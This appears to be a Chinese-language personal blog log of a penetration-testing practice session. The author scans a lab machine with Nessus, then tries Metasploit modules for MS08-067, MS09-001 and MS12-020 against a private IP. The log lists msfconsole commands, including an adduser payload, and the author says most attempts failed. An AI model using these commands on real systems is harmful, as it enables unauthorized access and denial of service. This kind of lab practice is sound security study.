4_演练3-16(Nessus,Metasploit)
今天主要是用Nessus扫出已知漏洞,然后根据漏洞用metasploit去攻击。不过今天好像不是很成功。
0x01 漏扫
装Nessus装了半天。
扫出如下:

0x02 利用第一个漏洞ms08_067
用Kali:
msfconsole -p 静默加载
search ms08_067

use exploit/windows/smb/ms08_067_netapi
然后看看有什么payloads
![]()
![]()
![]()
0x03 接下来利用另 一个ms09-001
![]()
![]()
show payloads
这里用widnows/adduser
set payload widnows/adduser

show options
set RHOST 192.168.0.203
exploit


???不懂为何不行?
再用其它payload都fail了。。。

不知道为什么
0x03 接下来利用另 一个ms09-001
search ms09-001


不懂是啥意思。。我没有set payload,明天再重新搞搞。
0x05 利用ms12-20

这个好像是把主机down掉的。。。
浙公网安备 33010602011771号